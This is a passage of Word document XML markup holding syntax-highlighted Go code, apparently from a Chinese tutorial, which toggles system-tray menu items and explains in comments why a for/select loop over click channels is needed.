        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">shown </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">:= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">toggle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">:= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>() {</w:t>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033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">shown </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>{</w:t>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00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>subMenuBottom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>()</w:t>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00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>subMenuBottom2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Hide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>()</w:t>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00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mQuitOrig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Hide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>()</w:t>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00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mEnabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Hide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>()</w:t>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00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">shown </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">else </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>{</w:t>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00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>subMenuBottom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Uncheck</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>()</w:t>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00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>subMenuBottom2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>()</w:t>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00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mQuitOrig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>()</w:t>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lastRenderedPageBreak/>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00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mEnabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>()</w:t>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00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">shown </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>}</w:t>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t>}</w:t>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i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>【执行部分】</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>如果删除此处的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>，所有动作将执行第一个动作，其他动作之后则不执行，即便点击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>退出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>也无济于事</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>{</w:t>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033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">select </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>{</w:t>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i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>这里的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> ClickedCh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>意思是，点击的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
